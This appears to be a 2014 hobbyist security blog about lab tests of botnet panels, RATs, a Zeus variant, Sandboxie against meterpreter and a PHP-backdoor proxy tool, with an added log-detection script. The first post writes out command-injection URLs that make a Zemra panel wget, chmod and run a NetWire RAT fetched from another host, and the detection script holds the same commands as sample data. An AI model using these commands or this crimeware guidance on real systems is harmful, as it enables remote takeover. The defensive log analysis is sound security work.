Wednesday, January 29, 2014

Zemra web panel hack with NetWIRE

Found an exploit for Zemra and used NetWire to hack the Zemra web panel.

Commands:

wget downloads testlinux.out (NetWire) to the current directory, http://192.168.56.141/zemra/system/
http://192.168.56.141/zemra/system/command.php?cmd=wget http://192.168.56.207/testlinux.out

chmod 777 makes it possible to execute testlinux.out (the NetWire RAT)
http://192.168.56.141/zemra/system/command.php?cmd=chmod 777 testlinux.out

./testlinux.out simply executes the NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=./testlinux.out

NetWire RAT: http://www.worldwiredlabs.com/netwire
Exploit: http://www.1337day.com/exploit/21663
My Video: http://youtu.be/w3Eo7HI8Bbk
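
A defender's view of the three requests above, as an added example that is not part of the original post: it scans a web access log for a client that sends a download, a chmod and an execute command, in that order, through the cmd parameter. The log lines, client IPs and function names are constructed for illustration, and matching any path ending in /command.php is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log; client IPs and timestamps are made up.
SAMPLE_LOG = """\
192.168.56.1 - - [29/Jan/2014:10:00:01 +0000] "GET /zemra/system/command.php?cmd=wget%20http://192.168.56.207/testlinux.out HTTP/1.1" 200 0
192.168.56.1 - - [29/Jan/2014:10:00:09 +0000] "GET /zemra/system/command.php?cmd=chmod%20777%20testlinux.out HTTP/1.1" 200 0
192.168.56.50 - - [29/Jan/2014:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.56.1 - - [29/Jan/2014:10:00:15 +0000] "GET /zemra/system/command.php?cmd=./testlinux.out HTTP/1.1" 200 0
192.168.56.50 - - [29/Jan/2014:10:00:20 +0000] "GET /zemra/system/command.php?cmd=chmod%20644%20notes.txt HTTP/1.1" 200 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" \d{3}')
# Order matters: fetch a file, set an execute bit on it, run it.
STAGES = [
    ("download", re.compile(r"^\s*(wget|curl)\s")),
    ("make_executable", re.compile(r"^\s*chmod\s+([ugoa]*\+[rwx]*x[rwx]*|[0-7]*[1357][0-7]*)\s")),
    ("execute", re.compile(r"^\s*\./\S+")),
]

def classify(cmd):
    """Return the staging step a decoded cmd= value belongs to, or None."""
    for name, pattern in STAGES:
        if pattern.search(cmd):
            return name
    return None

def staged_clients(log_text, script="/command.php"):
    """Map client IP -> decoded commands for clients that ran every stage in order."""
    progress, seen = {}, {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):  # assumed match on the script name
            continue
        for cmd in parse_qs(url.query).get("cmd", []):
            step = progress.get(client, 0)
            if step < len(STAGES) and classify(cmd) == STAGES[step][0]:
                progress[client] = step + 1
                seen.setdefault(client, []).append(cmd)
    return {c: seen[c] for c, n in progress.items() if n == len(STAGES)}

if __name__ == "__main__":
    for client, cmds in staged_clients(SAMPLE_LOG).items():
        print(client, cmds)
```

Only the client that completes the full chain is reported; the second client's chmod 644 request sets no execute bit and is ignored.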

Monday, January 27, 2014

HTTP Traffic 1.2 traffic generator

I downloaded HTTP Traffic 1.2, a jQuery script that you can run in your local browser, and tested it on my test blog testtraffic185.blogspot.com. I started out with 1 page view; after running the tool I had 49 page views in Google stats.
Video link: http://youtu.be/RdK3wCbghSk

Sunday, January 26, 2014

Sandboxie and meterpreter

Windows XP SP3 support ends April 8th, 2014. This is not good for people who are forced to use Windows XP at work. I decided to make a video showing an old CVE-2010-2568 exploit. The exploit worked and delivered a Metasploit reverse meterpreter TCP payload. The payload executed in the sandbox; as soon as I terminated the programs in the sandbox, the meterpreter session died. In the meterpreter session I tried getprivs and getsystem, but they were blocked by Sandboxie. Sandboxie also prevented me from migrating the process. But I was able to download and upload files in the meterpreter session and get a shell, so Sandboxie only minimizes the damage. Without Sandboxie everything worked as you would expect. Anyway, this solution is only for those who are forced to use outdated software.

CVE-2010-2568 exploit: http://www.exploit-db.com/exploits/14403/
You can get Sandboxie at http://www.sandboxie.com/index.php?DownloadSandboxie
Anyway, this is my video: http://youtu.be/3QVDIkXeRrc

Sunday, January 19, 2014

HVNC (hidden vnc bot)

Tested this bot in a local network in VMware. The bot can have a hidden VNC session, which is invisible to the user, or a visible session like Metasploit. This is probably a rip-off of leaked Zeus source code, but there are new features such as capturing video from a webcam and password protection on VNC bot sessions, unlike Zeus.
Check out the video at http://youtu.be/s3BGsata6Ow

Thursday, January 9, 2014

Cracked VPSProxy Gold 2.5.0


I decided to show Cracked VPSProxy Gold 2.5.0 to give people an idea of how blackhats can tunnel their HTTP and HTTPS traffic through a PHP backdoor or a chain of backdoors. They can even use a proxy before they connect to the PHP backdoors. I tested using Windows XP SP3 with cracked VPSProxy Gold 2.5.0 and used Kali as the server hosting the backdoor test.php.
Check the video out http://youtu.be/5a_IW7amGSQ

Sunday, January 5, 2014

Zeus 2.7.6.8 Panel MMBB

The simplest way to test MMBB is to install WAMP (http://www.wampserver.com/en/) on a Windows XP or higher VM.

The panel requires ionCube:
http://downloads3.ioncube.com/loader_...

The bot only works as localhost! Attention skids, take note: skip this bot unless you can get it working with Tor yourself.

Only using localhost makes sense if you want to use something like Torifier
http://ratnetw0rk.blogspot.com/p/setu... such as in this video http://youtu.be/71pZd26Ogww

The bot version is Zeus 2.9.6.1.
MMBB injects on IE 8 and Firefox 26 on Windows XP SP3.

VNC back connect works; tested the bk.exe server on Windows 8.1.

Zeus 2.7.6.8 MMBB Control Panel video